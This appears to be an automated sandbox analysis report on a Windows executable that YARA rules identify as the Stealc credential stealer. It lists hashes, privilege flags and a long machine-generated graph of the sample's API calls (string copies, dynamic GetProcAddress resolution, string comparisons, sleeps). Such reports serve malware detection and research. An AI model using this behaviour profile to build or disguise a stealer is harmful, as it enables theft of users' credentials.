                          Target ID:1
                          Start time:21:32:10
                          Start date:30/11/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x8e0000
                          File size:1'785'856 bytes
                          MD5 hash:A8D083B25843D8B182146793D9665AC5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.2188621265.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true


                            Execution Graph

                            Execution Coverage:4.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:25%
                            Total number of Nodes:1410
                            Total number of Limit Nodes:28
lstrcpy lstrcat 27610->27611 27612 901bbb 27610->27612 27611->27612 27613 901bea 27612->27613 27614 901be2 lstrcpy 27612->27614 27615 901bf1 lstrlen 27613->27615 27614->27613 27616 901c0d 27615->27616 27617 901c1f lstrcpy lstrcat 27616->27617 27618 901c32 27616->27618 27617->27618 27619 901c61 27618->27619 27620 901c59 lstrcpy 27618->27620 27621 901c68 lstrlen 27619->27621 27620->27619 27622 901c84 27621->27622 27623 901c96 lstrcpy lstrcat 27622->27623 27624 901ca9 27622->27624 27623->27624 27625 901cd8 27624->27625 27626 901cd0 lstrcpy 27624->27626 27625->27378 27626->27625 27628 8e2a24 SystemTimeToFileTime SystemTimeToFileTime 27627->27628 27628->27381 27628->27382 27630 90174f 27629->27630 27631 90176f lstrcpy 27630->27631 27632 901777 27630->27632 27631->27632 27633 9017a7 lstrcpy 27632->27633 27634 9017af 27632->27634 27633->27634 27635 9017df lstrcpy 27634->27635 27636 9017e7 27634->27636 27635->27636 27637 900325 lstrlen 27636->27637 27638 901817 lstrcpy 27636->27638 27637->27399 27638->27637 27640 8e4a60 2 API calls 27639->27640 27641 8e2e82 27640->27641 27642 8e4a60 2 API calls 27641->27642 27643 8e2ea0 27642->27643 27644 8e4a60 2 API calls 27643->27644 27645 8e2eb6 27644->27645 27646 8e4a60 2 API calls 27645->27646 27647 8e2ecb 27646->27647 27648 8e4a60 2 API calls 27647->27648 27649 8e2eec 27648->27649 27650 8e4a60 2 API calls 27649->27650 27651 8e2f01 27650->27651 27652 8e4a60 2 API calls 27651->27652 27653 8e2f19 27652->27653 27654 8e4a60 2 API calls 27653->27654 27655 8e2f3a 27654->27655 27656 8e4a60 2 API calls 27655->27656 27657 8e2f4f 27656->27657 27658 8e4a60 2 API calls 27657->27658 27659 8e2f65 27658->27659 27660 8e4a60 2 API calls 27659->27660 27661 8e2f7b 27660->27661 27662 8e4a60 2 API calls 27661->27662 27663 8e2f91 27662->27663 27664 8e4a60 2 API calls 27663->27664 27665 8e2faa 27664->27665 27666 8e4a60 2 API calls 27665->27666 27667 8e2fc0 27666->27667 27668 8e4a60 2 API calls 27667->27668 27669 8e2fd6 27668->27669 27670 8e4a60 2 API calls 
27669->27670 27671 8e2fec 27670->27671 27672 8e4a60 2 API calls 27671->27672 27673 8e3002 27672->27673 27674 8e4a60 2 API calls 27673->27674 27675 8e3018 27674->27675 27676 8e4a60 2 API calls 27675->27676 27677 8e3031 27676->27677 27678 8e4a60 2 API calls 27677->27678 27679 8e3047 27678->27679 27680 8e4a60 2 API calls 27679->27680 27681 8e305d 27680->27681 27682 8e4a60 2 API calls 27681->27682 27683 8e3073 27682->27683 27684 8e4a60 2 API calls 27683->27684 27685 8e3089 27684->27685 27686 8e4a60 2 API calls 27685->27686 27687 8e309f 27686->27687 27688 8e4a60 2 API calls 27687->27688 27689 8e30b8 27688->27689 27690 8e4a60 2 API calls 27689->27690 27691 8e30ce 27690->27691 27692 8e4a60 2 API calls 27691->27692 27693 8e30e4 27692->27693 27694 8e4a60 2 API calls 27693->27694 27695 8e30fa 27694->27695 27696 8e4a60 2 API calls 27695->27696 27697 8e3110 27696->27697 27698 8e4a60 2 API calls 27697->27698 27699 8e3126 27698->27699 27700 8e4a60 2 API calls 27699->27700 27701 8e313f 27700->27701 27702 8e4a60 2 API calls 27701->27702 27703 8e3155 27702->27703 27704 8e4a60 2 API calls 27703->27704 27705 8e316b 27704->27705 27706 8e4a60 2 API calls 27705->27706 27707 8e3181 27706->27707 27708 8e4a60 2 API calls 27707->27708 27709 8e3197 27708->27709 27710 8e4a60 2 API calls 27709->27710 27711 8e31ad 27710->27711 27712 8e4a60 2 API calls 27711->27712 27713 8e31c6 27712->27713 27714 8e4a60 2 API calls 27713->27714 27715 8e31dc 27714->27715 27716 8e4a60 2 API calls 27715->27716 27717 8e31f2 27716->27717 27718 8e4a60 2 API calls 27717->27718 27719 8e3208 27718->27719 27720 8e4a60 2 API calls 27719->27720 27721 8e321e 27720->27721 27722 8e4a60 2 API calls 27721->27722 27723 8e3234 27722->27723 27724 8e4a60 2 API calls 27723->27724 27725 8e324d 27724->27725 27726 8e4a60 2 API calls 27725->27726 27727 8e3263 27726->27727 27728 8e4a60 2 API calls 27727->27728 27729 8e3279 27728->27729 27730 8e4a60 2 API calls 27729->27730 27731 8e328f 27730->27731 27732 8e4a60 2 API calls 27731->27732 
27733 8e32a5 27732->27733 27734 8e4a60 2 API calls 27733->27734 27735 8e32bb 27734->27735 27736 8e4a60 2 API calls 27735->27736 27737 8e32d4 27736->27737 27738 8e4a60 2 API calls 27737->27738 27739 8e32ea 27738->27739 27740 8e4a60 2 API calls 27739->27740 27741 8e3300 27740->27741 27742 8e4a60 2 API calls 27741->27742 27743 8e3316 27742->27743 27744 8e4a60 2 API calls 27743->27744 27745 8e332c 27744->27745 27746 8e4a60 2 API calls 27745->27746 27747 8e3342 27746->27747 27748 8e4a60 2 API calls 27747->27748 27749 8e335b 27748->27749 27750 8e4a60 2 API calls 27749->27750 27751 8e3371 27750->27751 27752 8e4a60 2 API calls 27751->27752 27753 8e3387 27752->27753 27754 8e4a60 2 API calls 27753->27754 27755 8e339d 27754->27755 27756 8e4a60 2 API calls 27755->27756 27757 8e33b3 27756->27757 27758 8e4a60 2 API calls 27757->27758 27759 8e33c9 27758->27759 27760 8e4a60 2 API calls 27759->27760 27761 8e33e2 27760->27761 27762 8e4a60 2 API calls 27761->27762 27763 8e33f8 27762->27763 27764 8e4a60 2 API calls 27763->27764 27765 8e340e 27764->27765 27766 8e4a60 2 API calls 27765->27766 27767 8e3424 27766->27767 27768 8e4a60 2 API calls 27767->27768 27769 8e343a 27768->27769 27770 8e4a60 2 API calls 27769->27770 27771 8e3450 27770->27771 27772 8e4a60 2 API calls 27771->27772 27773 8e3469 27772->27773 27774 8e4a60 2 API calls 27773->27774 27775 8e347f 27774->27775 27776 8e4a60 2 API calls 27775->27776 27777 8e3495 27776->27777 27778 8e4a60 2 API calls 27777->27778 27779 8e34ab 27778->27779 27780 8e4a60 2 API calls 27779->27780 27781 8e34c1 27780->27781 27782 8e4a60 2 API calls 27781->27782 27783 8e34d7 27782->27783 27784 8e4a60 2 API calls 27783->27784 27785 8e34f0 27784->27785 27786 8e4a60 2 API calls 27785->27786 27787 8e3506 27786->27787 27788 8e4a60 2 API calls 27787->27788 27789 8e351c 27788->27789 27790 8e4a60 2 API calls 27789->27790 27791 8e3532 27790->27791 27792 8e4a60 2 API calls 27791->27792 27793 8e3548 27792->27793 27794 8e4a60 2 API calls 27793->27794 27795 8e355e 
27794->27795 27796 8e4a60 2 API calls 27795->27796 27797 8e3577 27796->27797 27798 8e4a60 2 API calls 27797->27798 27799 8e358d 27798->27799 27800 8e4a60 2 API calls 27799->27800 27801 8e35a3 27800->27801 27802 8e4a60 2 API calls 27801->27802 27803 8e35b9 27802->27803 27804 8e4a60 2 API calls 27803->27804 27805 8e35cf 27804->27805 27806 8e4a60 2 API calls 27805->27806 27807 8e35e5 27806->27807 27808 8e4a60 2 API calls 27807->27808 27809 8e35fe 27808->27809 27810 8e4a60 2 API calls 27809->27810 27811 8e3614 27810->27811 27812 8e4a60 2 API calls 27811->27812 27813 8e362a 27812->27813 27814 8e4a60 2 API calls 27813->27814 27815 8e3640 27814->27815 27816 8e4a60 2 API calls 27815->27816 27817 8e3656 27816->27817 27818 8e4a60 2 API calls 27817->27818 27819 8e366c 27818->27819 27820 8e4a60 2 API calls 27819->27820 27821 8e3685 27820->27821 27822 8e4a60 2 API calls 27821->27822 27823 8e369b 27822->27823 27824 8e4a60 2 API calls 27823->27824 27825 8e36b1 27824->27825 27826 8e4a60 2 API calls 27825->27826 27827 8e36c7 27826->27827 27828 8e4a60 2 API calls 27827->27828 27829 8e36dd 27828->27829 27830 8e4a60 2 API calls 27829->27830 27831 8e36f3 27830->27831 27832 8e4a60 2 API calls 27831->27832 27833 8e370c 27832->27833 27834 8e4a60 2 API calls 27833->27834 27835 8e3722 27834->27835 27836 8e4a60 2 API calls 27835->27836 27837 8e3738 27836->27837 27838 8e4a60 2 API calls 27837->27838 27839 8e374e 27838->27839 27840 8e4a60 2 API calls 27839->27840 27841 8e3764 27840->27841 27842 8e4a60 2 API calls 27841->27842 27843 8e377a 27842->27843 27844 8e4a60 2 API calls 27843->27844 27845 8e3793 27844->27845 27846 8e4a60 2 API calls 27845->27846 27847 8e37a9 27846->27847 27848 8e4a60 2 API calls 27847->27848 27849 8e37bf 27848->27849 27850 8e4a60 2 API calls 27849->27850 27851 8e37d5 27850->27851 27852 8e4a60 2 API calls 27851->27852 27853 8e37eb 27852->27853 27854 8e4a60 2 API calls 27853->27854 27855 8e3801 27854->27855 27856 8e4a60 2 API calls 27855->27856 27857 8e381a 27856->27857 
27858 8e4a60 2 API calls 27857->27858 27859 8e3830 27858->27859 27860 8e4a60 2 API calls 27859->27860 27861 8e3846 27860->27861 27862 8e4a60 2 API calls 27861->27862 27863 8e385c 27862->27863 27864 8e4a60 2 API calls 27863->27864 27865 8e3872 27864->27865 27866 8e4a60 2 API calls 27865->27866 27867 8e3888 27866->27867 27868 8e4a60 2 API calls 27867->27868 27869 8e38a1 27868->27869 27870 8e4a60 2 API calls 27869->27870 27871 8e38b7 27870->27871 27872 8e4a60 2 API calls 27871->27872 27873 8e38cd 27872->27873 27874 8e4a60 2 API calls 27873->27874 27875 8e38e3 27874->27875 27876 8e4a60 2 API calls 27875->27876 27877 8e38f9 27876->27877 27878 8e4a60 2 API calls 27877->27878 27879 8e390f 27878->27879 27880 8e4a60 2 API calls 27879->27880 27881 8e3928 27880->27881 27882 8e4a60 2 API calls 27881->27882 27883 8e393e 27882->27883 27884 8e4a60 2 API calls 27883->27884 27885 8e3954 27884->27885 27886 8e4a60 2 API calls 27885->27886 27887 8e396a 27886->27887 27888 8e4a60 2 API calls 27887->27888 27889 8e3980 27888->27889 27890 8e4a60 2 API calls 27889->27890 27891 8e3996 27890->27891 27892 8e4a60 2 API calls 27891->27892 27893 8e39af 27892->27893 27894 8e4a60 2 API calls 27893->27894 27895 8e39c5 27894->27895 27896 8e4a60 2 API calls 27895->27896 27897 8e39db 27896->27897 27898 8e4a60 2 API calls 27897->27898 27899 8e39f1 27898->27899 27900 8e4a60 2 API calls 27899->27900 27901 8e3a07 27900->27901 27902 8e4a60 2 API calls 27901->27902 27903 8e3a1d 27902->27903 27904 8e4a60 2 API calls 27903->27904 27905 8e3a36 27904->27905 27906 8e4a60 2 API calls 27905->27906 27907 8e3a4c 27906->27907 27908 8e4a60 2 API calls 27907->27908 27909 8e3a62 27908->27909 27910 8e4a60 2 API calls 27909->27910 27911 8e3a78 27910->27911 27912 8e4a60 2 API calls 27911->27912 27913 8e3a8e 27912->27913 27914 8e4a60 2 API calls 27913->27914 27915 8e3aa4 27914->27915 27916 8e4a60 2 API calls 27915->27916 27917 8e3abd 27916->27917 27918 8e4a60 2 API calls 27917->27918 27919 8e3ad3 27918->27919 27920 8e4a60 2 
API calls 27919->27920 27921 8e3ae9 27920->27921 27922 8e4a60 2 API calls 27921->27922 27923 8e3aff 27922->27923 27924 8e4a60 2 API calls 27923->27924 27925 8e3b15 27924->27925 27926 8e4a60 2 API calls 27925->27926 27927 8e3b2b 27926->27927 27928 8e4a60 2 API calls 27927->27928 27929 8e3b44 27928->27929 27930 8e4a60 2 API calls 27929->27930 27931 8e3b5a 27930->27931 27932 8e4a60 2 API calls 27931->27932 27933 8e3b70 27932->27933 27934 8e4a60 2 API calls 27933->27934 27935 8e3b86 27934->27935 27936 8e4a60 2 API calls 27935->27936 27937 8e3b9c 27936->27937 27938 8e4a60 2 API calls 27937->27938 27939 8e3bb2 27938->27939 27940 8e4a60 2 API calls 27939->27940 27941 8e3bcb 27940->27941 27942 8e4a60 2 API calls 27941->27942 27943 8e3be1 27942->27943 27944 8e4a60 2 API calls 27943->27944 27945 8e3bf7 27944->27945 27946 8e4a60 2 API calls 27945->27946 27947 8e3c0d 27946->27947 27948 8e4a60 2 API calls 27947->27948 27949 8e3c23 27948->27949 27950 8e4a60 2 API calls 27949->27950 27951 8e3c39 27950->27951 27952 8e4a60 2 API calls 27951->27952 27953 8e3c52 27952->27953 27954 8e4a60 2 API calls 27953->27954 27955 8e3c68 27954->27955 27956 8e4a60 2 API calls 27955->27956 27957 8e3c7e 27956->27957 27958 8e4a60 2 API calls 27957->27958 27959 8e3c94 27958->27959 27960 8e4a60 2 API calls 27959->27960 27961 8e3caa 27960->27961 27962 8e4a60 2 API calls 27961->27962 27963 8e3cc0 27962->27963 27964 8e4a60 2 API calls 27963->27964 27965 8e3cd9 27964->27965 27966 8e4a60 2 API calls 27965->27966 27967 8e3cef 27966->27967 27968 8e4a60 2 API calls 27967->27968 27969 8e3d05 27968->27969 27970 8e4a60 2 API calls 27969->27970 27971 8e3d1b 27970->27971 27972 8e4a60 2 API calls 27971->27972 27973 8e3d31 27972->27973 27974 8e4a60 2 API calls 27973->27974 27975 8e3d47 27974->27975 27976 8e4a60 2 API calls 27975->27976 27977 8e3d60 27976->27977 27978 8e4a60 2 API calls 27977->27978 27979 8e3d76 27978->27979 27980 8e4a60 2 API calls 27979->27980 27981 8e3d8c 27980->27981 27982 8e4a60 2 API calls 
27981->27982 27983 8e3da2 27982->27983 27984 8e4a60 2 API calls 27983->27984 27985 8e3db8 27984->27985 27986 8e4a60 2 API calls 27985->27986 27987 8e3dce 27986->27987 27988 8e4a60 2 API calls 27987->27988 27989 8e3de7 27988->27989 27990 8e4a60 2 API calls 27989->27990 27991 8e3dfd 27990->27991 27992 8e4a60 2 API calls 27991->27992 27993 8e3e13 27992->27993 27994 8e4a60 2 API calls 27993->27994 27995 8e3e29 27994->27995 27996 8e4a60 2 API calls 27995->27996 27997 8e3e3f 27996->27997 27998 8e4a60 2 API calls 27997->27998 27999 8e3e55 27998->27999 28000 8e4a60 2 API calls 27999->28000 28001 8e3e6e 28000->28001 28002 8e4a60 2 API calls 28001->28002 28003 8e3e84 28002->28003 28004 8e4a60 2 API calls 28003->28004 28005 8e3e9a 28004->28005 28006 8e4a60 2 API calls 28005->28006 28007 8e3eb0 28006->28007 28008 8e4a60 2 API calls 28007->28008 28009 8e3ec6 28008->28009 28010 8e4a60 2 API calls 28009->28010 28011 8e3edc 28010->28011 28012 8e4a60 2 API calls 28011->28012 28013 8e3ef5 28012->28013 28014 8e4a60 2 API calls 28013->28014 28015 8e3f0b 28014->28015 28016 8e4a60 2 API calls 28015->28016 28017 8e3f21 28016->28017 28018 8e4a60 2 API calls 28017->28018 28019 8e3f37 28018->28019 28020 8e4a60 2 API calls 28019->28020 28021 8e3f4d 28020->28021 28022 8e4a60 2 API calls 28021->28022 28023 8e3f63 28022->28023 28024 8e4a60 2 API calls 28023->28024 28025 8e3f7c 28024->28025 28026 8e4a60 2 API calls 28025->28026 28027 8e3f92 28026->28027 28028 8e4a60 2 API calls 28027->28028 28029 8e3fa8 28028->28029 28030 8e4a60 2 API calls 28029->28030 28031 8e3fbe 28030->28031 28032 8e4a60 2 API calls 28031->28032 28033 8e3fd4 28032->28033 28034 8e4a60 2 API calls 28033->28034 28035 8e3fea 28034->28035 28036 8e4a60 2 API calls 28035->28036 28037 8e4003 28036->28037 28038 8e4a60 2 API calls 28037->28038 28039 8e4019 28038->28039 28040 8e4a60 2 API calls 28039->28040 28041 8e402f 28040->28041 28042 8e4a60 2 API calls 28041->28042 28043 8e4045 28042->28043 28044 8e4a60 2 API calls 28043->28044 
28045 8e405b 28044->28045 28046 8e4a60 2 API calls 28045->28046 28047 8e4071 28046->28047 28048 8e4a60 2 API calls 28047->28048 28049 8e408a 28048->28049 28050 8e4a60 2 API calls 28049->28050 28051 8e40a0 28050->28051 28052 8e4a60 2 API calls 28051->28052 28053 8e40b6 28052->28053 28054 8e4a60 2 API calls 28053->28054 28055 8e40cc 28054->28055 28056 8e4a60 2 API calls 28055->28056 28057 8e40e2 28056->28057 28058 8e4a60 2 API calls 28057->28058 28059 8e40f8 28058->28059 28060 8e4a60 2 API calls 28059->28060 28061 8e4111 28060->28061 28062 8e4a60 2 API calls 28061->28062 28063 8e4127 28062->28063 28064 8e4a60 2 API calls 28063->28064 28065 8e413d 28064->28065 28066 8e4a60 2 API calls 28065->28066 28067 8e4153 28066->28067 28068 8e4a60 2 API calls 28067->28068 28069 8e4169 28068->28069 28070 8e4a60 2 API calls 28069->28070 28071 8e417f 28070->28071 28072 8e4a60 2 API calls 28071->28072 28073 8e4198 28072->28073 28074 8e4a60 2 API calls 28073->28074 28075 8e41ae 28074->28075 28076 8e4a60 2 API calls 28075->28076 28077 8e41c4 28076->28077 28078 8e4a60 2 API calls 28077->28078 28079 8e41da 28078->28079 28080 8e4a60 2 API calls 28079->28080 28081 8e41f0 28080->28081 28082 8e4a60 2 API calls 28081->28082 28083 8e4206 28082->28083 28084 8e4a60 2 API calls 28083->28084 28085 8e421f 28084->28085 28086 8e4a60 2 API calls 28085->28086 28087 8e4235 28086->28087 28088 8e4a60 2 API calls 28087->28088 28089 8e424b 28088->28089 28090 8e4a60 2 API calls 28089->28090 28091 8e4261 28090->28091 28092 8e4a60 2 API calls 28091->28092 28093 8e4277 28092->28093 28094 8e4a60 2 API calls 28093->28094 28095 8e428d 28094->28095 28096 8e4a60 2 API calls 28095->28096 28097 8e42a6 28096->28097 28098 8e4a60 2 API calls 28097->28098 28099 8e42bc 28098->28099 28100 8e4a60 2 API calls 28099->28100 28101 8e42d2 28100->28101 28102 8e4a60 2 API calls 28101->28102 28103 8e42e8 28102->28103 28104 8e4a60 2 API calls 28103->28104 28105 8e42fe 28104->28105 28106 8e4a60 2 API calls 28105->28106 28107 8e4314 
28106->28107 28108 8e4a60 2 API calls 28107->28108 28109 8e432d 28108->28109 28110 8e4a60 2 API calls 28109->28110 28111 8e4343 28110->28111 28112 8e4a60 2 API calls 28111->28112 28113 8e4359 28112->28113 28114 8e4a60 2 API calls 28113->28114 28115 8e436f 28114->28115 28116 8e4a60 2 API calls 28115->28116 28117 8e4385 28116->28117 28118 8e4a60 2 API calls 28117->28118 28119 8e439b 28118->28119 28120 8e4a60 2 API calls 28119->28120 28121 8e43b4 28120->28121 28122 8e4a60 2 API calls 28121->28122 28123 8e43ca 28122->28123 28124 8e4a60 2 API calls 28123->28124 28125 8e43e0 28124->28125 28126 8e4a60 2 API calls 28125->28126 28127 8e43f6 28126->28127 28128 8e4a60 2 API calls 28127->28128 28129 8e440c 28128->28129 28130 8e4a60 2 API calls 28129->28130 28131 8e4422 28130->28131 28132 8e4a60 2 API calls 28131->28132 28133 8e443b 28132->28133 28134 8e4a60 2 API calls 28133->28134 28135 8e4451 28134->28135 28136 8e4a60 2 API calls 28135->28136 28137 8e4467 28136->28137 28138 8e4a60 2 API calls 28137->28138 28139 8e447d 28138->28139 28140 8e4a60 2 API calls 28139->28140 28141 8e4493 28140->28141 28142 8e4a60 2 API calls 28141->28142 28143 8e44a9 28142->28143 28144 8e4a60 2 API calls 28143->28144 28145 8e44c2 28144->28145 28146 8e4a60 2 API calls 28145->28146 28147 8e44d8 28146->28147 28148 8e4a60 2 API calls 28147->28148 28149 8e44ee 28148->28149 28150 8e4a60 2 API calls 28149->28150 28151 8e4504 28150->28151 28152 8e4a60 2 API calls 28151->28152 28153 8e451a 28152->28153 28154 8e4a60 2 API calls 28153->28154 28155 8e4530 28154->28155 28156 8e4a60 2 API calls 28155->28156 28157 8e4549 28156->28157 28158 8e4a60 2 API calls 28157->28158 28159 8e455f 28158->28159 28160 8e4a60 2 API calls 28159->28160 28161 8e4575 28160->28161 28162 8e4a60 2 API calls 28161->28162 28163 8e458b 28162->28163 28164 8e4a60 2 API calls 28163->28164 28165 8e45a1 28164->28165 28166 8e4a60 2 API calls 28165->28166 28167 8e45b7 28166->28167 28168 8e4a60 2 API calls 28167->28168 28169 8e45d0 28168->28169 
28170 8e4a60 2 API calls 28169->28170 28171 8e45e6 28170->28171 28172 8e4a60 2 API calls 28171->28172 28173 8e45fc 28172->28173 28174 8e4a60 2 API calls 28173->28174 28175 8e4612 28174->28175 28176 8e4a60 2 API calls 28175->28176 28177 8e4628 28176->28177 28178 8e4a60 2 API calls 28177->28178 28179 8e463e 28178->28179 28180 8e4a60 2 API calls 28179->28180 28181 8e4657 28180->28181 28182 8e4a60 2 API calls 28181->28182 28183 8e466d 28182->28183 28184 8e4a60 2 API calls 28183->28184 28185 8e4683 28184->28185 28186 8e4a60 2 API calls 28185->28186 28187 8e4699 28186->28187 28188 8e4a60 2 API calls 28187->28188 28189 8e46af 28188->28189 28190 8e4a60 2 API calls 28189->28190 28191 8e46c5 28190->28191 28192 8e4a60 2 API calls 28191->28192 28193 8e46de 28192->28193 28194 8e4a60 2 API calls 28193->28194 28195 8e46f4 28194->28195 28196 8e4a60 2 API calls 28195->28196 28197 8e470a 28196->28197 28198 8e4a60 2 API calls 28197->28198 28199 8e4720 28198->28199 28200 8e4a60 2 API calls 28199->28200 28201 8e4736 28200->28201 28202 8e4a60 2 API calls 28201->28202 28203 8e474c 28202->28203 28204 8e4a60 2 API calls 28203->28204 28205 8e4765 28204->28205 28206 8e4a60 2 API calls 28205->28206 28207 8e477b 28206->28207 28208 8e4a60 2 API calls 28207->28208 28209 8e4791 28208->28209 28210 8e4a60 2 API calls 28209->28210 28211 8e47a7 28210->28211 28212 8e4a60 2 API calls 28211->28212 28213 8e47bd 28212->28213 28214 8e4a60 2 API calls 28213->28214 28215 8e47d3 28214->28215 28216 8e4a60 2 API calls 28215->28216 28217 8e47ec 28216->28217 28218 8e4a60 2 API calls 28217->28218 28219 8e4802 28218->28219 28220 8e4a60 2 API calls 28219->28220 28221 8e4818 28220->28221 28222 8e4a60 2 API calls 28221->28222 28223 8e482e 28222->28223 28224 8e4a60 2 API calls 28223->28224 28225 8e4844 28224->28225 28226 8e4a60 2 API calls 28225->28226 28227 8e485a 28226->28227 28228 8e4a60 2 API calls 28227->28228 28229 8e4873 28228->28229 28230 8e4a60 2 API calls 28229->28230 28231 8e4889 28230->28231 28232 8e4a60 2 
API calls 28231->28232 28233 8e489f 28232->28233 28234 8e4a60 2 API calls 28233->28234 28235 8e48b5 28234->28235 28236 8e4a60 2 API calls 28235->28236 28237 8e48cb 28236->28237 28238 8e4a60 2 API calls 28237->28238 28239 8e48e1 28238->28239 28240 8e4a60 2 API calls 28239->28240 28241 8e48fa 28240->28241 28242 8e4a60 2 API calls 28241->28242 28243 8e4910 28242->28243 28244 8e4a60 2 API calls 28243->28244 28245 8e4926 28244->28245 28246 8e4a60 2 API calls 28245->28246 28247 8e493c 28246->28247 28248 8e4a60 2 API calls 28247->28248 28249 8e4952 28248->28249 28250 8e4a60 2 API calls 28249->28250 28251 8e4968 28250->28251 28252 8e4a60 2 API calls 28251->28252 28253 8e4981 28252->28253 28254 8e4a60 2 API calls 28253->28254 28255 8e4997 28254->28255 28256 8e4a60 2 API calls 28255->28256 28257 8e49ad 28256->28257 28258 8e4a60 2 API calls 28257->28258 28259 8e49c3 28258->28259 28260 8e4a60 2 API calls 28259->28260 28261 8e49d9 28260->28261 28262 8e4a60 2 API calls 28261->28262 28263 8e49ef 28262->28263 28264 8e4a60 2 API calls 28263->28264 28265 8e4a08 28264->28265 28266 8e4a60 2 API calls 28265->28266 28267 8e4a1e 28266->28267 28268 8e4a60 2 API calls 28267->28268 28269 8e4a34 28268->28269 28270 8e4a60 2 API calls 28269->28270 28271 8e4a4a 28270->28271 28272 9068f0 28271->28272 28273 9068fd 43 API calls 28272->28273 28274 906d0e 8 API calls 28272->28274 28273->28274 28275 906da4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28274->28275 28276 906e18 28274->28276 28275->28276 28277 906ee2 28276->28277 28278 906e25 8 API calls 28276->28278 28279 906eeb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28277->28279 28280 906f5f 28277->28280 28278->28277 28279->28280 28281 906ff9 28280->28281 28282 906f6c 6 API calls 28280->28282 28283 907120 28281->28283 28284 907006 12 API calls 28281->28284 28282->28281 28285 907129 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28283->28285 28286 90719d 
28283->28286 28284->28283 28285->28286 28287 9071d1 28286->28287 28288 9071a6 GetProcAddress GetProcAddress 28286->28288 28289 907205 28287->28289 28290 9071da GetProcAddress GetProcAddress 28287->28290 28288->28287 28291 907212 10 API calls 28289->28291 28292 9072fd 28289->28292 28290->28289 28291->28292 28293 907362 28292->28293 28294 907306 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28292->28294 28295 90736b GetProcAddress 28293->28295 28296 90737e 28293->28296 28294->28293 28295->28296 28297 9006ef 28296->28297 28298 907387 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28296->28298 28299 8e1530 28297->28299 28298->28297 28608 8e1610 28299->28608 28301 8e153b 28302 8e1555 lstrcpy 28301->28302 28303 8e155d 28301->28303 28302->28303 28304 8e1577 lstrcpy 28303->28304 28305 8e157f 28303->28305 28304->28305 28306 8e1599 lstrcpy 28305->28306 28307 8e15a1 28305->28307 28306->28307 28308 8e1605 28307->28308 28309 8e15fd lstrcpy 28307->28309 28310 8ff390 lstrlen 28308->28310 28309->28308 28311 8ff3c4 28310->28311 28312 8ff3cb lstrcpy 28311->28312 28313 8ff3d7 lstrlen 28311->28313 28312->28313 28314 8ff3e8 28313->28314 28315 8ff3ef lstrcpy 28314->28315 28316 8ff3fb lstrlen 28314->28316 28315->28316 28317 8ff40c 28316->28317 28318 8ff413 lstrcpy 28317->28318 28319 8ff41f 28317->28319 28318->28319 28320 8ff438 lstrcpy 28319->28320 28321 8ff444 28319->28321 28320->28321 28322 8ff466 lstrcpy 28321->28322 28323 8ff472 28321->28323 28322->28323 28324 8ff49a lstrcpy 28323->28324 28325 8ff4a6 28323->28325 28324->28325 28326 8ff4ca lstrcpy 28325->28326 28386 8ff4e0 28325->28386 28326->28386 28327 8ff4ec lstrlen 28327->28386 28328 8ff699 lstrcpy 28328->28386 28329 8ff581 lstrcpy 28329->28386 28330 8ff6c8 lstrcpy 28391 8ff6d0 28330->28391 28331 8ff5a5 lstrcpy 28331->28386 28332 8ff659 lstrcpy 28332->28386 28333 8ff77c lstrcpy 28333->28391 28334 8ff7f6 StrCmpCA 28335 8ff8ef StrCmpCA 28334->28335 28334->28391 28339 90006e 28335->28339 28335->28386 28336 
8ffc09 StrCmpCA 28347 90000b 28336->28347 28336->28386 28337 8ff91e lstrlen 28337->28386 28338 8fff2d StrCmpCA 28343 8fff40 Sleep 28338->28343 28350 8fff55 28338->28350 28340 90008d lstrlen 28339->28340 28344 900085 lstrcpy 28339->28344 28345 9000a7 28340->28345 28341 8ffc38 lstrlen 28341->28386 28342 8ff82a lstrcpy 28342->28391 28343->28386 28344->28340 28354 9000c7 lstrlen 28345->28354 28357 9000bf lstrcpy 28345->28357 28346 90002a lstrlen 28353 900044 28346->28353 28347->28346 28349 900022 lstrcpy 28347->28349 28348 8ffa7e lstrcpy 28348->28386 28349->28346 28351 8fff74 lstrlen 28350->28351 28355 8fff6c lstrcpy 28350->28355 28359 8fff8e 28351->28359 28352 8ff94f lstrcpy 28352->28386 28358 8fffae lstrlen 28353->28358 28362 90005c lstrcpy 28353->28362 28361 9000e1 28354->28361 28355->28351 28356 8ffd98 lstrcpy 28356->28386 28357->28354 28376 8fffc8 28358->28376 28359->28358 28367 8fffa6 lstrcpy 28359->28367 28360 8ffc69 lstrcpy 28360->28386 28366 900101 28361->28366 28373 9000f9 lstrcpy 28361->28373 28362->28358 28363 8ff971 lstrcpy 28363->28386 28365 8ffaad lstrcpy 28365->28391 28374 8e1610 4 API calls 28366->28374 28367->28358 28368 8ff070 28 API calls 28368->28386 28369 8ffdc7 lstrcpy 28369->28391 28370 8ffc8b lstrcpy 28370->28386 28371 8e1530 8 API calls 28371->28386 28372 8ff878 lstrcpy 28372->28391 28373->28366 28394 8ffff3 28374->28394 28375 8ff190 35 API calls 28375->28391 28377 8fffe8 28376->28377 28378 8fffe0 lstrcpy 28376->28378 28379 8e1610 4 API calls 28377->28379 28378->28377 28379->28394 28380 8ff9c2 lstrcpy 28380->28386 28381 8ffb04 lstrcpy 28381->28391 28382 8ffb7e StrCmpCA 28382->28336 28382->28391 28383 8ffcdc lstrcpy 28383->28386 28384 8ffe1e lstrcpy 28384->28391 28385 8ffe98 StrCmpCA 28385->28338 28385->28391 28386->28327 28386->28328 28386->28329 28386->28330 28386->28331 28386->28332 28386->28335 28386->28336 28386->28337 28386->28338 28386->28341 28386->28348 28386->28352 28386->28356 28386->28360 